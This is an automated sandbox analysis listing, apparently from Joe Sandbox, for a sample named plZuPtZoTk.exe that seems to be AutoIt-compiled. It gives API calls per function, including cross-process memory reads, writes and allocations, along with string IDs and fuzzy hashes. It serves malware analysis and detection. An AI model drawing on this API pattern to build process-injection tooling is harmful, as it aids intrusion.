                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21062
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: a566e628d15d211f6cd193854a2475b316dddb92354c87847668c6cd61ed4d13
                                                                      • Instruction ID: 91e5ac3fa5581f4ca69fc7f9c423e51bbb9a96c626239b1374eb99431305d2cd
                                                                      • Opcode Fuzzy Hash: a566e628d15d211f6cd193854a2475b316dddb92354c87847668c6cd61ed4d13
                                                                      • Instruction Fuzzy Hash: F2F04935200355AFDB219FA9EC49F5A3BADFF89762F500424FA46C6290CA70D8818A60
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30324
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30331
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A3033E
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A3034B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30358
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00A3017D,?,00A332FC,?,00000001,00A02592,?), ref: 00A30365
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 8c1d15764a55c0cd50903c576368f506e4983511fee4fe7880f5b7abca437160
                                                                      • Instruction ID: 6946285ccf2aaf60b83385efe758a7d5493c2397e28271ce24ed1364f05808ec
                                                                      • Opcode Fuzzy Hash: 8c1d15764a55c0cd50903c576368f506e4983511fee4fe7880f5b7abca437160
                                                                      • Instruction Fuzzy Hash: 4E01A272800B159FC7309F66D890812F7F9FF503153158A3FE19656931C371A955CF80
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009FD752
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009FD764
                                                                      • _free.LIBCMT ref: 009FD776
                                                                      • _free.LIBCMT ref: 009FD788
                                                                      • _free.LIBCMT ref: 009FD79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: f3ec67cd27938a477ccede6ce3fa64c71e5d2dc6646864b6db231db41d45e509
                                                                      • Instruction ID: e81c61bfbe0b4ca1feb2c88a94c70441b7ffeab0382f7f5033c98ed6575bfac8
                                                                      • Opcode Fuzzy Hash: f3ec67cd27938a477ccede6ce3fa64c71e5d2dc6646864b6db231db41d45e509
                                                                      • Instruction Fuzzy Hash: 26F0127258520DABC621FBA4FAC5E3A77DEBB447207A40805F258EB511C770FC808B74
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00A25C58
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A25C6F
                                                                      • MessageBeep.USER32(00000000), ref: 00A25C87
                                                                      • KillTimer.USER32(?,0000040A), ref: 00A25CA3
                                                                      • EndDialog.USER32(?,00000001), ref: 00A25CBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: d836274a251513195687e8b654ea0348146b6f5317157e5712a679062bb2e406
                                                                      • Instruction ID: 574b55efd66bc99af546cd8c9910a4b77b43ea9c60ad40abcce63eea2b02de20
                                                                      • Opcode Fuzzy Hash: d836274a251513195687e8b654ea0348146b6f5317157e5712a679062bb2e406
                                                                      • Instruction Fuzzy Hash: 2101AE309007149FEB259B64ED4EF9577B8FF04706F001569B543614E1E7F0AA45CB50
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009F22BE
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009F22D0
                                                                      • _free.LIBCMT ref: 009F22E3
                                                                      • _free.LIBCMT ref: 009F22F4
                                                                      • _free.LIBCMT ref: 009F2305
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 4a70a96a9c228d490ed09e848385b824484d88ec932522eafe3390c902f88eb1
                                                                      • Instruction ID: cc5c0051ae07cb306a8f7049a2d173ddd849b8c39195c045d3dc4038635ab719
                                                                      • Opcode Fuzzy Hash: 4a70a96a9c228d490ed09e848385b824484d88ec932522eafe3390c902f88eb1
                                                                      • Instruction Fuzzy Hash: 1AF03A71A801268BC612FFD8BD01EA83B68BB187A0700055BF524D72B1CB700993AFE4
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 009D95D4
                                                                      • StrokeAndFillPath.GDI32(?,?,00A171F7,00000000,?,?,?), ref: 009D95F0
                                                                      • SelectObject.GDI32(?,00000000), ref: 009D9603
                                                                      • DeleteObject.GDI32 ref: 009D9616
                                                                      • StrokePath.GDI32(?), ref: 009D9631
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: aa02fde2cbf0bfa729d1b2af6c6737ef527559e2721caabc0519a1b77fe438ec
                                                                      • Instruction ID: ffc67c8436969152dee694282ffbaf6e1dc8a8b94275124cdcae27ee1828662d
                                                                      • Opcode Fuzzy Hash: aa02fde2cbf0bfa729d1b2af6c6737ef527559e2721caabc0519a1b77fe438ec
                                                                      • Instruction Fuzzy Hash: A8F01930145705EFDB12EFA5ED187643B65BB01372F448216F425551F1CB318992DF20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$_free
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3432400110-3206640213
                                                                      • Opcode ID: b08acab1262753b2003cceb2b06f4f4a6f92061422a24b3cbf6f0d40426f1563
                                                                      • Instruction ID: b9936d3bf3a9dec2c21606e7c8b836b04957dfa25b5f4f78d7215c779a3cd742
                                                                      • Opcode Fuzzy Hash: b08acab1262753b2003cceb2b06f4f4a6f92061422a24b3cbf6f0d40426f1563
                                                                      • Instruction Fuzzy Hash: 08D1F031A0420EDBDB289F68C855BFEB7B9EF05300F284519EB11AB650D7B99D80CBD1
                                                                      APIs
                                                                        • Part of subcall function 009E0242: EnterCriticalSection.KERNEL32(00A9070C,00A91884,?,?,009D198B,00A92518,?,?,?,009C12F9,00000000), ref: 009E024D
                                                                        • Part of subcall function 009E0242: LeaveCriticalSection.KERNEL32(00A9070C,?,009D198B,00A92518,?,?,?,009C12F9,00000000), ref: 009E028A
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 009E00A3: __onexit.LIBCMT ref: 009E00A9
                                                                      • __Init_thread_footer.LIBCMT ref: 00A47BFB
                                                                        • Part of subcall function 009E01F8: EnterCriticalSection.KERNEL32(00A9070C,?,?,009D8747,00A92514), ref: 009E0202
                                                                        • Part of subcall function 009E01F8: LeaveCriticalSection.KERNEL32(00A9070C,?,009D8747,00A92514), ref: 009E0235
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                      • API String ID: 535116098-3733170431
                                                                      • Opcode ID: 1ef9a83ef216ee21e5b48106016110d5e62ee268a2313a1cd12f09e304daa4dd
                                                                      • Instruction ID: 10afad40e811ba03e739ff781623aeab4da8176a36e8411ef432a4dc7ae36987
                                                                      • Opcode Fuzzy Hash: 1ef9a83ef216ee21e5b48106016110d5e62ee268a2313a1cd12f09e304daa4dd
                                                                      • Instruction Fuzzy Hash: 3A917978A04249EFCB14EF94D991EBDB7B1FF88304F108059F806AB292DB71AE45CB51
                                                                      APIs
                                                                        • Part of subcall function 00A2B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A221D0,?,?,00000034,00000800,?,00000034), ref: 00A2B42D
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A22760
                                                                        • Part of subcall function 00A2B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00A2B3F8
                                                                        • Part of subcall function 00A2B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00A2B355
                                                                        • Part of subcall function 00A2B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A22194,00000034,?,?,00001004,00000000,00000000), ref: 00A2B365
                                                                        • Part of subcall function 00A2B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A22194,00000034,?,?,00001004,00000000,00000000), ref: 00A2B37B
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A227CD
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A2281A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 3175977b152cb6916c7100cbb96e96f548ab25d267981b7cd7df4398702eb9f2
                                                                      • Instruction ID: fca6b1cab0ead106faf776737b6e8589da3af18031f222cb52900dbdc571d68e
                                                                      • Opcode Fuzzy Hash: 3175977b152cb6916c7100cbb96e96f548ab25d267981b7cd7df4398702eb9f2
                                                                      • Instruction Fuzzy Hash: 41410C72900228BFDB10DFA8D985BDEBBB8EB05700F104065EA55B7181DA706E45CB61
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\plZuPtZoTk.exe,00000104), ref: 009F1769
                                                                      • _free.LIBCMT ref: 009F1834
                                                                      • _free.LIBCMT ref: 009F183E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\plZuPtZoTk.exe
                                                                      • API String ID: 2506810119-3742649600
                                                                      • Opcode ID: 480109f44b7379202d203005191964d99df904a216ebcfe8ea9c163e1343a2c5
                                                                      • Instruction ID: 0e1f582d38a20a6ab0787fcc0de05c56eb1d25f500c55a5a1d00dcf065eae327
                                                                      • Opcode Fuzzy Hash: 480109f44b7379202d203005191964d99df904a216ebcfe8ea9c163e1343a2c5
                                                                      • Instruction Fuzzy Hash: 76318E71A0021CEFDB21EB999981EAEBBFCEB85350F204167FA0497211DB708E41CBD0
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A2C306
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00A2C34C
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A91990,01665130), ref: 00A2C395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: 1cb050de16b7b0b523680f93e5e2128cc0276491ec6ce34c6357ffc34f55a177
                                                                      • Instruction ID: dc0fe2836032d1a2e4ae5c0a088677c5f4207c8d8511f08af6a01aee1b8d8312
                                                                      • Opcode Fuzzy Hash: 1cb050de16b7b0b523680f93e5e2128cc0276491ec6ce34c6357ffc34f55a177
                                                                      • Instruction Fuzzy Hash: 59419F712043519FD720DF29E884B5EBBE8AF85320F148A2DF9A59B2D1D770E904CB62
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A5CC08,00000000,?,?,?,?), ref: 00A544AA
                                                                      • GetWindowLongW.USER32 ref: 00A544C7
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A544D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: 7ed6edb7fd848e59af766d9156ad6c6c7272d63c3994e352b8e7e2be933d5183
                                                                      • Instruction ID: afc0a6f45c03992b88f11e742896d36f62e879f6055727f2dd284c2aee548638
                                                                      • Opcode Fuzzy Hash: 7ed6edb7fd848e59af766d9156ad6c6c7272d63c3994e352b8e7e2be933d5183
                                                                      • Instruction Fuzzy Hash: C8318931240605AFDB209F78DC45BEA7BA9FB48339F208715F979A21E0D770AC959B50
                                                                      APIs
                                                                        • Part of subcall function 00A4335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A43077,?,?), ref: 00A43378
                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A4307A
                                                                      • _wcslen.LIBCMT ref: 00A4309B
                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00A43106
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 946324512-2422070025
                                                                      • Opcode ID: d18004c70f5b8da6f1e840abceeb22cce954dec559b677805f08821874b5cd87
                                                                      • Instruction ID: eeb2a2c18ecbbb49d858941990843bd7a0af4c5f347cf913a72c158685388348
                                                                      • Opcode Fuzzy Hash: d18004c70f5b8da6f1e840abceeb22cce954dec559b677805f08821874b5cd87
                                                                      • Instruction Fuzzy Hash: 8E31C13A600201DFDF10CF68C585EAA77F0EF94318F248299E9159B392DB72EE41C761
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A54705
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A54713
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A5471A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: b14c5a94726d8383e8f6d36cfc7c2d540afd39818bfbbf60fe6416a0cfbf454a
                                                                      • Instruction ID: 2300a7a3147f9c736ba6924a1dc503722a4a431f37ec885c762b147895e5412a
                                                                      • Opcode Fuzzy Hash: b14c5a94726d8383e8f6d36cfc7c2d540afd39818bfbbf60fe6416a0cfbf454a
                                                                      • Instruction Fuzzy Hash: 0E215EB5600209AFEB11DF64DCC1EA737ADFB8E3A9B040459FA009B251DB30EC56CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 176396367-2734436370
                                                                      • Opcode ID: dbc73e04680f9d042e4b4bb2d60fbc34d935f34e6a672063fba117eabce06c9e
                                                                      • Instruction ID: ed643237be7f61e51794f524c9b032acd1badc0d89641f8d6aa541c44d3ae06c
                                                                      • Opcode Fuzzy Hash: dbc73e04680f9d042e4b4bb2d60fbc34d935f34e6a672063fba117eabce06c9e
                                                                      • Instruction Fuzzy Hash: 0D215B32204130AAD331BB2DEC12FB7B3E8AF95B00F10443AF94997141EB619D45C2E6
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A53840
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A53850
                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A53876
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
